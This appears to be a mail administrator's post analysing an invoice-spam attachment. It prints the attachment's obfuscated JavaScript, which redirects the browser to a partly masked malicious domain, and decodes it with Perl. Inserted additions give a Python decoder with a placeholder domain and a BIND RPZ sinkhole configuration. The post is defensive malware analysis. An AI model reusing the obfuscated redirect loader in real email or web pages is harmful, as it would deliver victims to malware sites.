The mail servers here started getting inundated with some weaponized email spam about invoice attachments.
The decoded contents of this spam contain the following JavaScript:
var s="ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00uvsltbhmjltfo/psh/us0y/iunm#!0?!czf!csjbo";
m = "";
for (i = 0; i < s.length; i++) {
  if (s.charCodeAt(i) == 28) { m += '&'; }                 // code 28 is an escape for '&'
  else if (s.charCodeAt(i) == 23) { m += '!'; }            // code 23 is an escape for '!'
  else { m += String.fromCharCode(s.charCodeAt(i) - 1); }  // everything else is stored one code point too high
}
document.write(m);
When I reverse-engineered it in Perl, it produced the following result:
#!/usr/bin/perl
use strict; use warnings;
# Obfuscated string copied from the spam's JavaScript; every character is one code point above the real one
my $s = 'ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00uvsltbhmjltfo/psh/us0y/iunm#!0?!czf!csjbo';
my @new;
push @new, chr( ord( $_ ) - 1 ) for split( //, $s );
print join( '', @new ) . "\n";
OUTPUT:
hello brian <meta http-equiv="refresh" content="0;url=http://XXXXturksagliksenXXXX.org.tr/x.html" /> bye brian
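As an added example (not code from the original post), here is a Python decoder that covers the whole scheme, including the two escape codes (28 for '&', 23 for '!') that the Perl one-liner can skip because this particular sample never uses them, and that then pulls the meta-refresh target out of the decoded HTML and defangs it for a report. The payload it decodes is constructed inline with a placeholder domain (malware.example.invalid), not the domain from the spam; the encoder exists only to build that sample.

```python
import re
from urllib.parse import urlsplit

# Code points the obfuscator uses as escapes instead of the usual shift by one.
ESCAPES = {28: '&', 23: '!'}


def decode_shifted(s: str) -> str:
    """Reverse the spam's scheme: escapes map directly, everything else shifts down by one."""
    out = []
    for ch in s:
        code = ord(ch)
        out.append(ESCAPES[code] if code in ESCAPES else chr(code - 1))
    return ''.join(out)


def encode_shifted(plain: str) -> str:
    """Exact inverse of decode_shifted; used here only to construct a sample payload."""
    reverse = {v: chr(k) for k, v in ESCAPES.items()}
    return ''.join(reverse[ch] if ch in reverse else chr(ord(ch) + 1) for ch in plain)


# Matches <meta http-equiv="refresh" content="N;url=..."> and captures the URL.
META_REFRESH = re.compile(
    r'<meta\s+http-equiv\s*=\s*"refresh"\s+content\s*=\s*"\s*\d+\s*;\s*url\s*=\s*([^"]+)"',
    re.IGNORECASE,
)


def extract_refresh_url(html: str):
    """Return the meta-refresh redirect target, or None if the HTML has none."""
    m = META_REFRESH.search(html)
    return m.group(1).strip() if m else None


def defang(url: str) -> str:
    """Make the URL safe to paste into a ticket: hxxp scheme, bracketed dots in the host."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace('http', 'hxxp', 1)
    host = parts.netloc.replace('.', '[.]')
    rest = parts.path + ('?' + parts.query if parts.query else '')
    return f'{scheme}://{host}{rest}'


def analyze(encoded: str) -> dict:
    """Decode the JavaScript string and report where it tries to send the browser."""
    decoded = decode_shifted(encoded)
    url = extract_refresh_url(decoded)
    return {'decoded': decoded, 'url': url, 'defanged': defang(url) if url else None}


# Constructed sample with a placeholder domain; it ends in '& thanks!' so that
# both escape codes (28 and 23) actually appear in the encoded form.
SAMPLE_PLAIN = ('hello brian <meta http-equiv="refresh" '
                'content="0;url=http://malware.example.invalid/x.html" /> bye brian & thanks!')
SAMPLE_ENCODED = encode_shifted(SAMPLE_PLAIN)

if __name__ == '__main__':
    report = analyze(SAMPLE_ENCODED)
    print(report['decoded'])
    print('redirect target:', report['defanged'])
```

The encoded sample starts with the same `ifmmp!csjbo!=nfub!iuuq.frvjw>#sfgsfti#` prefix as the string in the spam, which is a quick way to confirm the decoder matches the JavaScript; the defanged URL is what you would put in the block list or the abuse ticket rather than a live link.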
I rigged up our name servers so that when one of our customers tries to hit that domain, it just redirects to a web page indicating that it was blocked.
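One way to implement that sinkhole, as an added example and not the post's own configuration: a BIND 9 response-policy zone (RPZ) that rewrites answers for the spam domain and all its subdomains to an internal block page. It assumes BIND with RPZ support, a host blockpage.corp.example that serves the "blocked" notice, and uses BLOCKED-DOMAIN.example as a placeholder for the domain the post defangs.

```bind
// named.conf: consult the policy zone before answering any client query
options {
    response-policy { zone "rpz.corp.example"; };
};

zone "rpz.corp.example" {
    type master;
    file "/etc/bind/db.rpz.corp.example";
};

// /etc/bind/db.rpz.corp.example
$TTL 300
@   IN SOA  ns1.corp.example. hostmaster.corp.example. ( 2024010101 3600 900 604800 300 )
    IN NS   ns1.corp.example.

; Local-data action: clients asking for the spam domain get the block page instead.
BLOCKED-DOMAIN.example.     IN CNAME blockpage.corp.example.
*.BLOCKED-DOMAIN.example.   IN CNAME blockpage.corp.example.
```

The web server behind blockpage.corp.example has to answer for any Host header, since the browser will still request x.html with the spam domain as the host. This works cleanly here because the redirect target is plain http; for an https target the client would see a certificate error rather than the notice, which still blocks but is less informative. Logging RPZ hits (the `rpz` category in BIND's logging) also gives you a list of which customers' machines opened the attachment.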